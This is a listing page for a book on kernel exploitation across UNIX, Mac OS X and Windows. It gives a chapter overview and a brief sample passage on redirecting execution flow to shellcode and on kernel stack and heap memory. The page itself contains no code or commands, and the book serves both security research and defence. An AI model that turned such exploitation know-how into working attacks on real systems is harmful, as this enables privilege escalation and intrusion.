A Guide to Kernel Exploitation: Attacking the Core (PDF) by Enrico Perla

By Enrico Perla (B.Sc. Computer Science, University of Torino; M.Sc. Computer Science, Trinity College Dublin) and Massimiliano Oldani

ISBN-10: 1597494860

ISBN-13: 9781597494861

A Guide to Kernel Exploitation: Attacking the Core discusses the theoretical techniques and approaches needed to develop reliable and effective kernel-level exploits, and applies them to different operating systems, namely UNIX derivatives, Mac OS X, and Windows. Concepts and tactics are presented categorically, so that even when a specific vulnerability has been patched, the foundational information provided will help attackers write a newer, better attack, or help pen testers, auditors, and the like develop a more concrete design and defensive structure.
The book is organized into four parts. Part I introduces the kernel and sets out the theoretical basis on which to build the rest of the book. Part II focuses on different operating systems and describes exploits for them that target various bug classes. Part III, on remote kernel exploitation, analyzes the effects of the remote scenario and presents new techniques to target remote issues. It includes a step-by-step analysis of the development of a reliable, one-shot, remote exploit for a real vulnerability: a bug affecting the SCTP subsystem found in the Linux kernel. Finally, Part IV wraps up the analysis of kernel exploitation and looks at what the future may hold.

  • Covers a range of operating system families: UNIX derivatives, Mac OS X, Windows
  • Details common scenarios such as generic memory corruption issues (stack overflow, heap overflow, etc.), logical bugs and race conditions
  • Takes the reader from user-land exploitation to the world of kernel-land (OS) exploits/attacks, with a particular focus on the steps that lead to the creation of successful techniques, in order to give the reader something more than just a set of tricks

Additional info for A Guide to Kernel Exploitation: Attacking the Core

Sample text

Introducing the Kernel and the World of Kernel Exploitation

One of the goals of the attacker is to increase as much as possible the chances of successful execution flow redirection to the memory area where the shellcode is stored.

There are two basic types of kernel memory: the kernel stack, which is associated with each thread/process whenever it runs at the kernel level, and the kernel heap, which is used each time a kernel path needs to allocate some small object or some temporary space. As we did for pointer corruption vulnerabilities (and as we will do throughout this chapter), we leave the details regarding exploitation of such issues to Chapter 3 (for generic approaches) and to the chapters in Part II of this book.
